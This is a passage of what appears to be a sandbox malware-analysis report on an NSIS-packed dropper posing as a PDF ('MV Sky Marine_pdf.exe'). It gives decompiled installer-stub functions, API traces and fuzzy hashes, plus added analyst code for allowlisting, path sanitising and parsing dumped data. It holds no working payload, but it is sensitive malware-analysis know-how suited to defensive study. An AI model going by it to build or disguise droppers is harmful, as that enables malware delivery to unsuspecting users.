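HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")  # resolved numeric argument / pointer


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int          # call-site address
    args: list[str]


@dataclass
class FunctionProfile:
    calls: list[ApiCall] = field(default_factory=list)
    strings: set[str] = field(default_factory=set)

    @property
    def apis(self) -> set[str]:
        return {c.api for c in self.calls}


def parse_record(text: str) -> FunctionProfile:
    """Build a profile from the 'APIs' bullets and the 'String ID' line."""
    prof = FunctionProfile()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            prof.calls.append(ApiCall(m["api"], m["module"], int(m["ref"], 16), args))
            # Anything that is neither '?' (unresolved) nor a hex value is a
            # literal the decompiler resolved at the call site.
            prof.strings.update(a for a in args if a != "?" and not HEX_ARG.match(a))
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            # String IDs are '$'-separated in the report.
            prof.strings.update(s for s in m["ids"].split("$") if s)
    return prof


# Assumed analyst allowlist: every listed API and literal must be present.
INSTALLER_RUNTIME_HELPERS = {
    "special_folder_resolver": {
        "apis": {"SHGetSpecialFolderLocation", "SHGetPathFromIDListA",
                 "CoTaskMemFree", "lstrcatA"},
        "strings": {r"\Microsoft\Internet Explorer\Quick Launch"},
    },
}


def classify(prof: FunctionProfile) -> list[str]:
    """Names of allowlist helpers whose API and string sets are subsets of the profile."""
    return [name for name, sig in INSTALLER_RUNTIME_HELPERS.items()
            if sig["apis"] <= prof.apis and sig["strings"] <= prof.strings]


def call_sites(prof: FunctionProfile, api: str) -> list[int]:
    """Sorted call-site addresses of one API, for cross-referencing the listing."""
    return sorted(c.ref for c in prof.calls if c.api == api)


# Record copied from the report above (function at 0x00405D46).
SAMPLE_RECORD = r"""
• GetVersion.KERNEL32(?,0079E578,00000000,00405048,0079E578,00000000), ref: 00405DEE
• GetSystemDirectoryA.KERNEL32 ref: 00405E69
• GetWindowsDirectoryA.KERNEL32(HfkcdoekxlzOjbt,00000400), ref: 00405E7C
• SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405EB8
• SHGetPathFromIDListA.SHELL32(00000000,HfkcdoekxlzOjbt), ref: 00405EC6
• CoTaskMemFree.OLE32(00000000), ref: 00405ED1
• lstrcatA.KERNEL32(HfkcdoekxlzOjbt,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EF3
• lstrlenA.KERNEL32(HfkcdoekxlzOjbt,?,0079E578,00000000,00405048,0079E578,00000000), ref: 00405F45
• String ID: HfkcdoekxlzOjbt$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
"""

if __name__ == "__main__":
    profile = parse_record(SAMPLE_RECORD)
    print(sorted(profile.apis))
    print("matches:", classify(profile))
    print("lstrcatA call sites:", [hex(a) for a in call_sites(profile, "lstrcatA")])
```

The match is deliberately a subset test rather than an exact fingerprint: the Opcode ID and Instruction Fuzzy Hash already identify this exact function body, whereas the API/string profile survives recompilation with a different installer version, which is what an allowlist needs.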

C-Code - Quality: 100%
			/* Decompiled status/log update routine. It takes the pending message in
			   the static buffer at 0x79e578 (implied capacity 0x800 bytes), optionally
			   appends _a8, pushes the result to a status window and a list-view
			   control, and consults the flag word at 0x7a2854: bit 0 overwrites the
			   last list-view item instead of inserting a new one and then rolls the
			   buffer back, bit 1 skips the list-view, bit 2 skips the status window.
			   The raw message numbers are the Win32 list-view messages
			   LVM_GETITEMCOUNT (0x1004), LVM_INSERTITEMA (0x1007) / LVM_SETITEMA
			   (0x1006) and LVM_ENSUREVISIBLE (0x1013); _v52.._v32 is an LVITEMA
			   built on the stack. */
			E00405010(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;   // list-view window handle (*0x7a1f84)
				signed int _v12;      // flag word (*0x7a2854)
				CHAR* _v32;           // LVITEMA.pszText
				long _v44;            // LVITEMA.iSubItem
				int _v48;             // LVITEMA.iItem
				void* _v52;           // LVITEMA.mask
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a1f84; // 0x0 -- nothing to do if the list-view window does not exist
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7a2854;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;   // bit 0: overwrite-last-item mode
					if(_t39 == 0) {
						// Resolve _a4 into the static buffer via E00405D46 (the path/special-folder resolver listed above).
						E00405D46(0, _t39, 0x79e578, 0x79e578, _a4);
					}
					_t26 = lstrlenA(0x79e578);
					_a4 = _t26;                 // _a4 is reused to hold the current buffer length
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7a1f68, 0x79e578);   // status text window
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x79e578;                            // LVITEMA.pszText
							_v52 = 1;                                   // LVITEMA.mask = LVIF_TEXT
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);     // LVM_GETITEMCOUNT
							_v44 = 0;                                   // LVITEMA.iSubItem
							_v48 = _t29 - _t39;                         // iItem: count (append) or count - 1 (overwrite)
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // LVM_INSERTITEMA, or LVM_SETITEMA when bit 0 is set
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);  // LVM_ENSUREVISIBLE: scroll the item into view
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79e578)) = 0;   // overwrite mode: truncate the appended _a8 back off the buffer
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);   // buffer length + lstrlen(_a8), expressed as pointer arithmetic
						if(_t26 < 0x800) {               // bounds check against the 0x800-byte buffer before lstrcatA
							_t26 = lstrcatA(0x79e578, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000,?), ref: 00405049
                                                                                                  • lstrlenA.KERNEL32(00402C7D,0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000), ref: 00405059
                                                                                                  • lstrcatA.KERNEL32(0079E578,00402C7D,00402C7D,0079E578,00000000,00000000,00000000), ref: 0040506C
                                                                                                  • SetWindowTextA.USER32(0079E578,0079E578), ref: 0040507E
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050A4
                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050BE
                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050CC
                                                                                                  Strings
Memory Dump Source
• Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                  • String ID: xy
                                                                                                  • API String ID: 2531174081-925674813
                                                                                                  • Opcode ID: 40bff2556f20eb0340b9ac5e59045691797800af035be7ff80d4fa762c7d4773
                                                                                                  • Instruction ID: 6c974c1b12fe2e55137cd847d22857b9bae7c95a9329c6436bda2760abdefe46
                                                                                                  • Opcode Fuzzy Hash: 40bff2556f20eb0340b9ac5e59045691797800af035be7ff80d4fa762c7d4773
                                                                                                  • Instruction Fuzzy Hash: B9214871900518BBDF119FA5CD8499FBFA9EF05358F14807AF944B6291C2798A418FA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
			/* Path sanitiser, working in place on _a4: skips the "\\?\" extended-length
			   prefix, keeps a leading two-byte path spec (drive letter or UNC) untouched,
			   drops control bytes and the characters *?|<>/": from the remainder, then
			   trims trailing spaces and backslashes. This is validate_filename() from the
			   NSIS installer stub, which the sample uses as its packer. */
			E00405F86(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {   /* "\\?\" */
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405884(_t17) != 0) {   /* E00405884 (not shown here) recognises a two-byte path spec such as "C:"; it is skipped so its ':' survives the filter below */
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;   /* start of the region that may be rewritten */
				_t16 = _t17;   /* write cursor */
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405842("*?|<>/\":", _t5))) == 0) {   /* E00405842 behaves as a find-char: it returns a pointer to the NUL when _t5 is not in the forbidden set */
							E004059BC(_t16, _t17, CharNextA(_t17) - _t17);   /* copy one (possibly multi-byte) character down to the write cursor */
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;   /* terminate the compacted string */
				while(1) {                       /* strip trailing ' ' and '\' but never step before _t15 */
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}
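The sanitiser above is easier to reason about when run on concrete input. The C program below is an example added to this report; it is not code from the sample or from the sandbox. It keeps the control flow of E00405F86 but assumes single-byte ANSI text (CharNextA/CharPrevA become pointer arithmetic) and stands in for the unshown helper E00405884 with a check for a two-byte "X:" drive or "\\" UNC prefix, which is an assumption. The inputs are constructed; the second one is modelled on the quoted command line that appears as a stack argument in the CharNextA trace below and shows that a path passed in with its surrounding quotes loses its drive colon, because the leading quote defeats the prefix check and ':' is in the forbidden set.

```c
#include <stdio.h>
#include <string.h>

/* Characters the routine refuses: the "*?|<>/\":" literal from E00405F86. */
static const char *FORBIDDEN = "*?|<>/\":";

/* Stand-in for E00405884, which the report does not show. ASSUMPTION: a
 * two-byte path spec is either a drive letter "X:" or a "\\" UNC prefix. */
static int has_path_spec(const char *p)
{
    char dl = (char)(p[0] | 0x20);           /* fold a drive letter to lower case */
    return (p[0] == '\\' && p[1] == '\\') ||
           (dl >= 'a' && dl <= 'z' && p[1] == ':');
}

/* In-place sanitiser with the control flow of E00405F86. CharNextA/CharPrevA
 * are replaced by ++/-- (ASSUMPTION: single-byte ANSI, no DBCS lead bytes). */
char *sanitize_path(char *buf)
{
    char *in = buf, *out, *out_start;

    /* Skip the extended-length "\\?\" prefix; it stays in the buffer untouched. */
    if (in[0] == '\\' && in[1] == '\\' && in[2] == '?' && in[3] == '\\')
        in += 4;
    /* Skip a drive or UNC spec so its ':' or "\\" is not filtered away. */
    if (*in != '\0' && has_path_spec(in))
        in += 2;

    /* Compact the remainder, dropping control bytes and forbidden characters. */
    out = out_start = in;
    for (; *in != '\0'; in++) {
        unsigned char c = (unsigned char)*in;
        if (c > 0x1f && strchr(FORBIDDEN, c) == NULL)
            *out++ = (char)c;
    }
    *out = '\0';

    /* Trim trailing spaces and backslashes, never stepping before out_start. */
    while (out > out_start) {
        out--;
        if (*out != ' ' && *out != '\\')
            break;
        *out = '\0';
    }
    return buf;
}

/* Sanitises a copy of `input` and compares it with `expected`;
 * returns 1 on a match, 0 otherwise (also 0 if the input does not fit). */
int sanitize_matches(const char *input, const char *expected)
{
    char buf[512];
    if (strlen(input) >= sizeof buf)
        return 0;
    strcpy(buf, input);
    return strcmp(sanitize_path(buf), expected) == 0;
}

int main(void)
{
    /* Constructed inputs, not strings recovered from the sample. */
    const char *samples[] = {
        "\\\\?\\C:\\Users\\user\\Desktop\\file?.exe\\ ",
        "\"C:\\Users\\user\\Desktop\\MV Sky Marine_pdf.exe\" ",
        "C:\\Temp\\a<b>c|d.txt",
        "\\\\server\\share\\dir:name\\",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char buf[512];
        strcpy(buf, samples[i]);
        printf("%-50s -> %s\n", samples[i], sanitize_path(buf));
    }
    return 0;
}
```

Two details matter for an analyst reading logs from this routine: the "\\?\" prefix and the drive or UNC spec are left in the buffer (only the pointer advances past them, so the caller sees the full path), and the trailing-trim loop stops at the start of the rewritten region, so a bare drive spec such as "C:" is never emptied.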

                                                                                                  APIs
                                                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405FDE
                                                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FEB
                                                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405FF0
                                                                                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00406000
                                                                                                  Strings
Memory Dump Source
• Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Char$Next$Prev
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 589700163-1353090027
                                                                                                  • Opcode ID: add5774134fefb6b4a968e5ffda14362b3630782001e33bdd13cec8e60841bb7
                                                                                                  • Instruction ID: fc89eac497b9ccd795659d243f46df7f66e6e837a8045d863f1532a0380c6c09
                                                                                                  • Opcode Fuzzy Hash: add5774134fefb6b4a968e5ffda14362b3630782001e33bdd13cec8e60841bb7
                                                                                                  • Instruction Fuzzy Hash: 7111C851809B9229FB3216244C40B777FD9CF967A0F18447BE9C1B22C2C67C5C829F6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
			/* WM_CTLCOLOR* handler: for messages 0x133..0x138 (WM_CTLCOLOREDIT through
			   WM_CTLCOLORSTATIC) it applies the per-control colour record stored in the
			   control's GWL_USERDATA and returns the background brush. The record layout
			   {text colour, background colour, brush style, brush handle, background mode,
			   flags} and the flag bits match the ctlcolors handling in the NSIS installer stub. */
			E00404047(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {   /* unsigned (msg - 0x133) > 5: not a WM_CTLCOLOR* message */
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);   /* -21 = GWL_USERDATA: pointer to the colour record */
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;                           /* text colour */
				if((_t49[5] & 0x00000002) != 0) {        /* flag 0x02: value is a COLOR_* index */
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {        /* flag 0x01: apply the text colour */
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);                 /* OPAQUE / TRANSPARENT */
				_t37 = _t49[1];                          /* background colour */
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {        /* flag 0x08: value is a COLOR_* index */
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {        /* flag 0x04: apply the background colour */
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {        /* flag 0x10: (re)create the background brush */
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);              /* release the brush created on the previous paint */
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];                          /* background brush handle, 0 when none was created */
			}

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2320649405-0
                                                                                                  • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                  • Instruction ID: 6b96e76a269b901c22994d9b2ee5e04cd87fa54416849518722627f507c2901a
                                                                                                  • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                  • Instruction Fuzzy Hash: A32184B1904705ABCB319F68DD08B4B7BF8AF41714F04CA69EA91F22E0C734E904CB55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E004026AF(struct _OVERLAPPED* __ebx) {
                                                                                                  				void* _t27;
                                                                                                  				long _t32;
                                                                                                  				struct _OVERLAPPED* _t47;
                                                                                                  				void* _t51;
                                                                                                  				void* _t53;
                                                                                                  				void* _t56;
                                                                                                  				void* _t57;
                                                                                                  				void* _t58;
                                                                                                  
                                                                                                  				_t47 = __ebx;                                                                                  // 0x004026af
                                                                                                  				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;                                                      // 0x004026b1
                                                                                                  				_t52 = E00402A29(0xfffffff0);                                                                  // 0x004026bd
                                                                                                  				 *(_t58 - 0x38) = _t24;                                                                        // 0x004026c0
                                                                                                  				if(E00405884(_t52) == 0) {                                                                     // 0x004026ca
                                                                                                  					E00402A29(0xffffffed);                                                                     // 0x004026ce
                                                                                                  				}                                                                                              // 0x004026ce
                                                                                                  				E004059DC(_t52);                                                                               // 0x004026d4
                                                                                                  				_t27 = E004059FB(_t52, 0x40000000, 2);                                                         // 0x004026e1
                                                                                                  				 *(_t58 + 8) = _t27;                                                                           // 0x004026e9
                                                                                                  				if(_t27 != 0xffffffff) {                                                                       // 0x004026ec
                                                                                                  					_t32 =  *0x7a27b4;                                                                         // 0x004026f2
                                                                                                  					 *(_t58 - 0x30) = _t32;                                                                    // 0x00402700
                                                                                                  					_t51 = GlobalAlloc(0x40, _t32);                                                            // 0x00402705
                                                                                                  					if(_t51 != _t47) {                                                                         // 0x00402709
                                                                                                  						E00403227(_t47);                                                                       // 0x0040270c
                                                                                                  						E004031F5(_t51,  *(_t58 - 0x30));                                                      // 0x00402715
                                                                                                  						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));                                             // 0x00402721
                                                                                                  						 *(_t58 - 0x34) = _t56;                                                                // 0x00402725
                                                                                                  						if(_t56 != _t47) {                                                                     // 0x00402728
                                                                                                  							E00402F4E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));        // 0x00402732
                                                                                                  							while( *_t56 != _t47) {                                                            // 0x00402751
                                                                                                  								_t49 =  *_t56;                                                                 // 0x00402739
                                                                                                  								_t57 = _t56 + 8;                                                               // 0x0040273e
                                                                                                  								 *(_t58 - 0x48) =  *_t56;                                                      // 0x00402746
                                                                                                  								E004059BC( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);                       // 0x00402749
                                                                                                  								_t56 = _t57 +  *(_t58 - 0x48);                                                 // 0x0040274e
                                                                                                  							}                                                                                  // 0x0040274e
                                                                                                  							GlobalFree( *(_t58 - 0x34));                                                       // 0x00402758
                                                                                                  						}                                                                                      // 0x00402758
                                                                                                  						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);                     // 0x0040276a
                                                                                                  						GlobalFree(_t51);                                                                      // 0x00402771
                                                                                                  						 *((intOrPtr*)(_t58 - 0xc)) = E00402F4E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);   // 0x00402783
                                                                                                  					}                                                                                          // 0x00402783
                                                                                                  					CloseHandle( *(_t58 + 8));                                                                 // 0x00402789
                                                                                                  				}                                                                                              // 0x00402789
                                                                                                  				_t53 = 0xfffffff3;                                                                             // 0x00402794
                                                                                                  				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {                                                       // 0x00402795
                                                                                                  					_t53 = 0xffffffef;                                                                         // 0x00402799
                                                                                                  					DeleteFileA( *(_t58 - 0x38));                                                              // 0x0040279d
                                                                                                  					 *((intOrPtr*)(_t58 - 4)) = 1;                                                             // 0x004027a3
                                                                                                  				}                                                                                              // 0x004027a3
                                                                                                  				_push(_t53);                                                                                   // 0x004027aa
                                                                                                  				E00401423();                                                                                   // 0x00402197
                                                                                                  				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t58 - 4));                                           // 0x004028c1
                                                                                                  				return 0;                                                                                      // 0x004028cd
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                                  • GlobalFree.KERNEL32 ref: 00402758
                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                                  • GlobalFree.KERNEL32 ref: 00402771
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3294113728-0
                                                                                                  • Opcode ID: ca436d7c3055f5cba6d880a3d3da9571fe56de1c1ad2371efc703a34a348f66a
                                                                                                  • Instruction ID: 7c14a8c99997377652a6f1b3e70a5547bba05f23c8739af497d5b63ca876fb36
                                                                                                  • Opcode Fuzzy Hash: ca436d7c3055f5cba6d880a3d3da9571fe56de1c1ad2371efc703a34a348f66a
                                                                                                  • Instruction Fuzzy Hash: BB31AB71C00029BBCF216FA5DE89DAE7E79EF05364F10422AF920762E1C6794D019BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
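The inner loop of E004026AF (`while( *_t56 != _t47)`) walks a record stream that E00402F4E has just decompressed into the `_t56` allocation and copies each record into the header buffer at `_t51`: it reads a 32-bit size at `_t56`, a 32-bit destination offset at `_t56 + 4`, calls E004059BC(dest, src, len) on the bytes that follow, and advances by 8 + size until the size field is zero. The result is written with WriteFile and then E00402F4E(-1, hFile) appends the remaining payload; a negative return deletes the file and pushes the alternate status id. This layout, the `ret = -666` (0xfffffd66) initial value and the status ids -13/-17 are, in my reading (not stated by the report), the uninstaller-writer of the open-source NSIS installer stub, which would make the outer sample an NSIS-packed dropper. The following Python is an added example, not part of the sandbox report and not code from the sample: it re-implements the record walk so an analyst can parse a dumped `_t56` blob, and it adds the bounds checks the native memcpy-style copy does not perform. The sample input is constructed.

```python
"""Added example: parser and applier for the (size, offset, data) record
stream consumed by the while-loop in E004026AF. Not code from the sample
or from the sandbox vendor; record layout inferred from the decompiled code.

    u32 size | u32 dest_offset | size bytes of data   ... repeated
    u32 0                                             <- terminator (loop exit)
"""
import struct

REC_HDR = struct.Struct("<II")  # little-endian x86: size, dest_offset


def build_records(patches):
    """Serialise (dest_offset, data) pairs into the record stream plus terminator.
    Only used here to construct sample input."""
    out = bytearray()
    for dest_offset, data in patches:
        out += REC_HDR.pack(len(data), dest_offset)
        out += data
    out += struct.pack("<I", 0)  # size == 0 ends the native loop
    return bytes(out)


def parse_records(records):
    """Walk the stream the way the decompiled loop does, yielding
    (dest_offset, data). Raises ValueError on truncation instead of
    reading past the end of the allocation (the native code does not check)."""
    pos = 0
    while True:
        if pos + 4 > len(records):
            raise ValueError("stream ends without a zero-size terminator")
        size = struct.unpack_from("<I", records, pos)[0]
        if size == 0:  # *_t56 == 0 -> loop exits
            return
        if pos + REC_HDR.size > len(records):
            raise ValueError("truncated record header at offset %d" % pos)
        _, dest_offset = REC_HDR.unpack_from(records, pos)
        start = pos + REC_HDR.size  # _t57 = _t56 + 8
        data = records[start:start + size]
        if len(data) != size:
            raise ValueError("record at %d claims %d bytes, only %d present"
                             % (pos, size, len(data)))
        yield dest_offset, data
        pos = start + size  # _t56 = _t57 + size


def apply_records(filebuf, records):
    """Apply the stream to filebuf (the _t51 header buffer) in place.
    Returns the number of records applied; refuses writes outside filebuf,
    which the native E004059BC(dest, src, len) copy would silently perform."""
    applied = 0
    for dest_offset, data in parse_records(records):
        end = dest_offset + len(data)
        if end > len(filebuf):
            raise ValueError("record would write %d..%d past a %d-byte buffer"
                             % (dest_offset, end, len(filebuf)))
        filebuf[dest_offset:end] = data
        applied += 1
    return applied


def demo():
    """Constructed sample: a 32-byte zeroed stand-in for the header buffer and
    two records, as one might rebuild them from the dumped _t56 allocation."""
    filebuf = bytearray(32)
    stream = build_records([(4, b"MZ\x90\x00"), (16, b"PE\x00\x00")])
    count = apply_records(filebuf, stream)
    return count, bytes(filebuf)


if __name__ == "__main__":
    n, patched = demo()
    print("applied %d records" % n)
    print(patched.hex())
```

To use it on real data, carve the `_t56` allocation (second GlobalAlloc, size from `*(_t58 - 0x20)`) out of a process dump and feed it to `parse_records`; each yielded offset tells you which bytes of the written-out header the stub overrides.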

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00402C06(intOrPtr _a4) {
                                                                                                  				char _v68;
                                                                                                  				long _t6;
                                                                                                  				struct HWND__* _t7;
                                                                                                  				struct HWND__* _t15;
                                                                                                  
                                                                                                  				if(_a4 != 0) {                                                                                 // 0x00402c12
                                                                                                  					_t15 =  *0x79594c; // 0x0                                                                  // 0x00402c14
                                                                                                  					if(_t15 != 0) {                                                                            // 0x00402c1b
                                                                                                  						_t15 = DestroyWindow(_t15);                                                            // 0x00402c1e
                                                                                                  					}                                                                                          // 0x00402c1e
                                                                                                  					 *0x79594c = 0;                                                                            // 0x00402c24
                                                                                                  					return _t15;                                                                               // 0x00000000
                                                                                                  				}                                                                                              // 0x00402c24
                                                                                                  				__eflags =  *0x79594c; // 0x0                                                                  // 0x00402c2c
                                                                                                  				if(__eflags != 0) {                                                                            // 0x00402c32
                                                                                                  					return E004060F0(0);                                                                       // 0x00000000
                                                                                                  				}                                                                                              // 0x00402c35
                                                                                                  				_t6 = GetTickCount();                                                                          // 0x00402c3c
                                                                                                  				__eflags = _t6 -  *0x7a27ac;                                                                   // 0x00402c42
                                                                                                  				if(_t6 >  *0x7a27ac) {                                                                         // 0x00402c48
                                                                                                  					__eflags =  *0x7a27a8;                                                                     // 0x00402c4a
                                                                                                  					if( *0x7a27a8 == 0) {                                                                      // 0x00402c50
